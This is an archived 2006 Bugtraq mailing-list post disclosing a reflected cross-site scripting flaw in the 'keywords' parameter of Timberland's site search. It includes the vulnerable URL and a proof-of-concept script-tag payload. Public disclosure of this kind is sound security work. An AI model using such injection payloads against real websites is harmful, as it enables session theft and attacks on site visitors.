[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Timberland Search XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Timberland Search XSS Vulnerability
From: try_og@xxxxxxxxxxx
Date: 1 Jun 2006 21:51:42 -0000

There's a vulnerability in Timberland's search engine.

The variable 'keywords' in searchHandler/index.jsp is not correctly sanitized.

URL:
hxxp://www.timberland.com/searchHandler/index.jsp?keywords=[XSS Code]

Example:
hxxp://www.timberland.com/searchHandler/index.jsp?keywords=<script>alert('test');</script>

Author: O.G.

Prev by Date: Re: Fire fox dos exploit
Next by Date: New <<BackTrack release announcement
Previous by thread: VMSA-2006-0001 - VMware ESX Server Cross Site Scripting issue
Next by thread: New <<BackTrack release announcement
Index(es):
- Date
- Thread